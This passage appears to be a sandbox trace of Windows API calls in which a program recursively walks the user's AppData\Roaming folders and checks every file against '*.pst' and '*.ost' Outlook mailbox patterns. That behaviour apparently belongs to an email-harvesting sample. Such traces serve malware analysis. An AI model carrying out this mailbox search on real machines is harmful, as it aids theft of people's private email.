out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0" [0249.261] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\*" [0249.261] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\Sonar1.0\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x5d036b0 [0249.261] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.261] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.261] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.262] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.262] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.262] PathMatchSpecW (pszFile="sonar_policy.xml", pszSpec="*.pst") returned 0 [0249.262] PathMatchSpecW (pszFile="sonar_policy.xml", pszSpec="*.ost") returned 0 [0249.262] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0249.262] FindClose (in: hFindFile=0x5d036b0 | out: hFindFile=0x5d036b0) returned 1 [0249.262] FindNextFileW (in: hFindFile=0x5d03bf0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0249.262] FindClose (in: hFindFile=0x5d03bf0 | out: hFindFile=0x5d03bf0) returned 1 [0249.262] FindNextFileW (in: hFindFile=0x5d031d0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0 [0249.262] FindClose (in: hFindFile=0x5d031d0 | out: hFindFile=0x5d031d0) returned 1 [0249.262] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.262] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.262] PathCombineW (in: pszDest=0x235f210, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", pszFile="adsldraw" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw" [0249.262] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\*" [0249.262] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\*", lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0x5d02bd0 [0249.262] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.262] FindNextFileW (in: hFindFile=0x5d02bd0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0249.262] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.262] FindNextFileW (in: hFindFile=0x5d02bd0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0249.262] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.262] PathMatchSpecW (pszFile="autoclb.exe", pszSpec="*.pst") returned 0 [0249.262] PathMatchSpecW (pszFile="autoclb.exe", pszSpec="*.ost") returned 0 [0249.262] FindNextFileW (in: hFindFile=0x5d02bd0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0 [0249.262] FindClose (in: hFindFile=0x5d02bd0 | out: hFindFile=0x5d02bd0) returned 1 [0249.262] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.262] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.262] PathMatchSpecW (pszFile="B-502EY5C9UH.wav", pszSpec="*.pst") returned 0 [0249.263] PathMatchSpecW (pszFile="B-502EY5C9UH.wav", pszSpec="*.ost") returned 0 [0249.263] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.263] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.263] PathMatchSpecW (pszFile="bGwYD.ods", pszSpec="*.pst") returned 0 [0249.263] PathMatchSpecW (pszFile="bGwYD.ods", pszSpec="*.ost") returned 0 [0249.263] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.263] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.263] PathMatchSpecW (pszFile="C48bUUv yj.m4a", pszSpec="*.pst") returned 0 [0249.263] PathMatchSpecW (pszFile="C48bUUv yj.m4a", pszSpec="*.ost") returned 0 [0249.263] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.263] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.263] PathMatchSpecW (pszFile="DWnlEGvc2f7UXCtx_.bmp", pszSpec="*.pst") returned 0 [0249.263] PathMatchSpecW (pszFile="DWnlEGvc2f7UXCtx_.bmp", pszSpec="*.ost") returned 0 [0249.263] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.263] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.263] PathMatchSpecW (pszFile="f0BwoIlf9Ne0W.ots", pszSpec="*.pst") returned 0 [0249.263] PathMatchSpecW (pszFile="f0BwoIlf9Ne0W.ots", pszSpec="*.ost") returned 0 [0249.263] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.263] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.263] PathMatchSpecW (pszFile="FhGeOaOQMWabsmGgFl.wav", pszSpec="*.pst") returned 0 [0249.263] PathMatchSpecW (pszFile="FhGeOaOQMWabsmGgFl.wav", pszSpec="*.ost") returned 0 [0249.263] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.263] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.263] PathMatchSpecW (pszFile="GoG6DuMvfigVwZ5HN.m4a", pszSpec="*.pst") returned 0 [0249.263] PathMatchSpecW (pszFile="GoG6DuMvfigVwZ5HN.m4a", pszSpec="*.ost") returned 0 [0249.263] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.263] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.263] PathMatchSpecW (pszFile="Gsylrs03CL3GLNS7.mp3", pszSpec="*.pst") returned 0 [0249.263] PathMatchSpecW (pszFile="Gsylrs03CL3GLNS7.mp3", pszSpec="*.ost") returned 0 [0249.263] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.263] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.263] PathMatchSpecW (pszFile="H8OzFZYizyKnodY.mp3", pszSpec="*.pst") returned 0 [0249.263] PathMatchSpecW (pszFile="H8OzFZYizyKnodY.mp3", pszSpec="*.ost") returned 0 [0249.263] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.263] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.263] PathMatchSpecW (pszFile="hgg0.swf", pszSpec="*.pst") returned 0 [0249.263] PathMatchSpecW (pszFile="hgg0.swf", pszSpec="*.ost") returned 0 [0249.263] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.263] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.263] PathCombineW (in: pszDest=0x235f210, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", pszFile="Identities" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities" [0249.264] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\*" [0249.264] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0x5d03bf0 [0249.264] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.264] FindNextFileW (in: hFindFile=0x5d03bf0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0249.264] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.264] FindNextFileW (in: hFindFile=0x5d03bf0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0249.264] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.264] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities", pszFile="{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}" [0249.264] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\*" [0249.264] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5d036b0 [0249.264] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.265] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.265] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.265] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0249.265] FindClose (in: hFindFile=0x5d036b0 | out: hFindFile=0x5d036b0) returned 1 [0249.265] FindNextFileW (in: hFindFile=0x5d03bf0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0 [0249.265] FindClose (in: hFindFile=0x5d03bf0 | out: hFindFile=0x5d03bf0) returned 1 [0249.265] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.265] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.265] PathMatchSpecW (pszFile="IGJ3NBnqssg16hi SSM.avi", pszSpec="*.pst") returned 0 [0249.265] PathMatchSpecW (pszFile="IGJ3NBnqssg16hi SSM.avi", pszSpec="*.ost") returned 0 [0249.265] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.265] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.265] PathMatchSpecW (pszFile="kvV5eFc.pdf", pszSpec="*.pst") returned 0 [0249.265] PathMatchSpecW (pszFile="kvV5eFc.pdf", pszSpec="*.ost") returned 0 [0249.265] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.265] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.265] PathMatchSpecW (pszFile="KZfC90mB7_N-.odt", pszSpec="*.pst") returned 0 [0249.265] PathMatchSpecW (pszFile="KZfC90mB7_N-.odt", pszSpec="*.ost") returned 0 [0249.265] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.265] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.265] PathCombineW (in: pszDest=0x235f210, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", pszFile="Macromedia" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia" [0249.265] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\*" [0249.265] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\*", lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0x5d02bd0 [0249.265] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.265] FindNextFileW (in: hFindFile=0x5d02bd0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0249.265] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.266] FindNextFileW (in: hFindFile=0x5d02bd0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0249.266] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.266] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia", pszFile="Flash Player" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player" [0249.266] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\*" [0249.266] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5d031d0 [0249.266] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.266] FindNextFileW (in: hFindFile=0x5d031d0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.266] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.266] FindNextFileW (in: hFindFile=0x5d031d0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.266] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.266] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player", pszFile="#SharedObjects" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects" [0249.266] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*" [0249.266] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x5d036b0 [0249.266] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.266] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.266] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.266] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.266] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.266] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", pszFile="DQQHJZ8C" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C" [0249.266] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\*" [0249.266] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x5d03770 [0249.266] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.266] FindNextFileW (in: hFindFile=0x5d03770, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0249.267] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.267] FindNextFileW (in: hFindFile=0x5d03770, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0 [0249.267] FindClose (in: hFindFile=0x5d03770 | out: hFindFile=0x5d03770) returned 1 [0249.267] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0249.267] FindClose (in: hFindFile=0x5d036b0 | out: hFindFile=0x5d036b0) returned 1 [0249.274] FindNextFileW (in: hFindFile=0x5d031d0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.274] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.274] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player", pszFile="macromedia.com" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" [0249.274] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*" [0249.274] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x5d03bf0 [0249.276] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.276] FindNextFileW (in: hFindFile=0x5d03bf0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.276] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.277] FindNextFileW (in: hFindFile=0x5d03bf0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.277] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.277] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="support" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" [0249.277] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*" [0249.277] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x5d036b0 [0249.277] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.277] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0249.277] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.277] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0249.277] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.277] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="flashplayer" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0249.277] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*" [0249.277] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x5d03770 [0249.277] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.277] FindNextFileW (in: hFindFile=0x5d03770, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0249.277] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.277] FindNextFileW (in: hFindFile=0x5d03770, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0249.277] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.277] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="sys" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0249.277] PathCombineW (in: pszDest=0x235d4d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*" [0249.277] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 0x4405930 [0249.278] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.278] FindNextFileW (in: hFindFile=0x4405930, lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 1 [0249.278] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.278] FindNextFileW (in: hFindFile=0x4405930, lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 1 [0249.278] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.278] PathMatchSpecW (pszFile="settings.sol", pszSpec="*.pst") returned 0 [0249.278] PathMatchSpecW (pszFile="settings.sol", pszSpec="*.ost") returned 0 [0249.278] FindNextFileW (in: hFindFile=0x4405930, lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 0 [0249.278] FindClose (in: hFindFile=0x4405930 | out: hFindFile=0x4405930) returned 1 [0249.278] FindNextFileW (in: hFindFile=0x5d03770, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0 [0249.278] FindClose (in: hFindFile=0x5d03770 | out: hFindFile=0x5d03770) returned 1 [0249.278] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0 [0249.278] FindClose (in: hFindFile=0x5d036b0 | out: hFindFile=0x5d036b0) returned 1 [0249.278] FindNextFileW (in: hFindFile=0x5d03bf0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0249.278] FindClose (in: hFindFile=0x5d03bf0 | out: hFindFile=0x5d03bf0) returned 1 [0249.278] FindNextFileW (in: hFindFile=0x5d031d0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0249.278] FindClose (in: hFindFile=0x5d031d0 | out: hFindFile=0x5d031d0) returned 1 [0249.278] FindNextFileW (in: hFindFile=0x5d02bd0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0 [0249.278] FindClose (in: hFindFile=0x5d02bd0 | out: hFindFile=0x5d02bd0) returned 1 [0249.278] FindNextFileW (in: hFindFile=0x5d03470, lpFindFileData=0x235efc0 | out: lpFindFileData=0x235efc0) returned 1 [0249.279] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.279] PathCombineW (in: pszDest=0x235f210, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", pszFile="Microsoft" | out: 